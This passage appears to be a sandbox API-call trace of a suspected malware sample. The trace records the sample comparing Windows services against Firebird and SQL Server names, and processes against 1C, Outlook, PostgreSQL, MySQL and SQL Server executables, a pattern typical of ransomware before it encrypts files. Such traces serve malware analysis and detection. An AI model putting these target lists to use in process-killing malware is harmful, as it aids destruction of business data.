(lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0262.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0262.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0262.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0262.213] lstrlenW (lpString="Dnscache") returned 8 [0262.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0262.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0262.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0262.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0262.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0262.213] lstrlenW (lpString="eventlog") returned 8 [0262.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0262.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0262.214] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0262.214] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0262.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0262.214] lstrlenW (lpString="EventSystem") returned 11 [0262.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0262.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0262.214] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0262.214] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0262.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0262.214] lstrlenW (lpString="gpsvc") returned 5 [0262.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0262.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0262.214] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0262.214] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0262.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0262.214] lstrlenW (lpString="lmhosts") returned 7 [0262.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0262.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0262.214] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0262.214] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0262.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0262.214] lstrlenW (lpString="MMCSS") returned 5 [0262.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0262.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0262.214] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0262.214] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0262.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0262.214] lstrlenW (lpString="nsi") returned 3 [0262.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0262.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0262.214] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0262.214] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0262.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0262.215] lstrlenW (lpString="PlugPlay") returned 8 [0262.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0262.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0262.215] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0262.215] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0262.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0262.215] lstrlenW (lpString="Power") returned 5 [0262.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0262.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0262.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0262.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0262.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0262.215] lstrlenW (lpString="ProfSvc") returned 7 [0262.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0262.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0262.215] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0262.215] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0262.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0262.215] lstrlenW (lpString="RpcEptMapper") returned 12 [0262.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0262.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0262.215] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0262.215] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0262.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0262.215] lstrlenW (lpString="RpcSs") returned 5 [0262.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0262.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0262.215] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0262.215] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0262.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0262.215] lstrlenW (lpString="SamSs") returned 5 [0262.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0262.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0262.215] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0262.216] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0262.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0262.216] lstrlenW (lpString="Schedule") returned 8 [0262.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0262.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0262.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0262.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0262.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0262.216] lstrlenW (lpString="SENS") returned 4 [0262.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0262.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0262.216] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0262.216] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0262.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0262.216] lstrlenW (lpString="ShellHWDetection") returned 16 [0262.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0262.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0262.216] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0262.216] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0262.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0262.216] lstrlenW (lpString="Spooler") returned 7 [0262.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0262.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0262.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0262.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0262.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0262.216] lstrlenW (lpString="Themes") returned 6 [0262.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0262.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0262.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0262.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0262.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0262.216] lstrlenW (lpString="UxSms") returned 5 [0262.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0262.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0262.217] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0262.217] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0262.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0262.217] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x565e68 | out: hHeap=0x4a0000) returned 1 [0262.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x128 [0262.218] Process32FirstW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.219] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.219] lstrlenW (lpString="System") returned 6 [0262.219] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0262.219] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0262.219] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0262.219] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0262.219] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0262.219] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0262.219] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0262.219] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.219] lstrlenW (lpString="smss.exe") returned 8 [0262.219] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0262.219] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0262.219] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0262.219] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0262.220] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0262.220] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0262.220] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0262.220] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.220] lstrlenW (lpString="csrss.exe") returned 9 [0262.220] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.220] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.220] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.220] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.220] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.220] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.220] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.220] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.220] lstrlenW (lpString="wininit.exe") returned 11 [0262.220] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0262.220] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0262.220] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0262.221] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0262.221] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0262.221] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0262.221] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0262.221] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.221] lstrlenW (lpString="csrss.exe") returned 9 [0262.221] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.221] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.221] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.221] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.221] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.221] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.221] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.221] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.221] lstrlenW (lpString="winlogon.exe") returned 12 [0262.221] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0262.221] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0262.221] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0262.222] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0262.222] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0262.222] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0262.222] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0262.222] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.222] lstrlenW (lpString="services.exe") returned 12 [0262.222] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0262.222] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0262.222] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0262.222] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0262.222] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0262.222] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0262.222] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0262.222] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.222] lstrlenW (lpString="lsass.exe") returned 9 [0262.222] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0262.222] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0262.222] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0262.223] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0262.223] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0262.223] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0262.223] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0262.223] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0262.223] lstrlenW (lpString="lsm.exe") returned 7 [0262.223] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0262.223] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0262.223] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0262.223] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0262.223] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0262.223] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0262.223] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0262.223] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.223] lstrlenW (lpString="svchost.exe") returned 11 [0262.223] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.224] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.224] lstrlenW (lpString="svchost.exe") returned 11 [0262.224] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.224] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.224] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.224] lstrlenW (lpString="svchost.exe") returned 11 [0262.225] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.225] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.225] lstrlenW (lpString="svchost.exe") returned 11 [0262.225] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.225] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.225] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.225] lstrlenW (lpString="svchost.exe") returned 11 [0262.226] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.226] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.226] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.226] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.226] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.226] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.226] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.226] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.226] lstrlenW (lpString="audiodg.exe") returned 11 [0262.226] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0262.226] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0262.226] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0262.226] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0262.226] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0262.226] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0262.226] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0262.226] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.226] lstrlenW (lpString="svchost.exe") returned 11 [0262.227] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.227] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.227] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.227] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.227] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.227] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.227] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.227] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0262.227] lstrlenW (lpString="userinit.exe") returned 12 [0262.227] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0262.227] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0262.227] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0262.227] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0262.227] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0262.227] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0262.227] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0262.227] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.228] lstrlenW (lpString="explorer.exe") returned 12 [0262.228] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0262.228] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0262.228] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0262.228] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0262.228] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0262.228] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.228] lstrlenW (lpString="dwm.exe") returned 7 [0262.228] Process32NextW (in: hSnapshot=0x128, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, 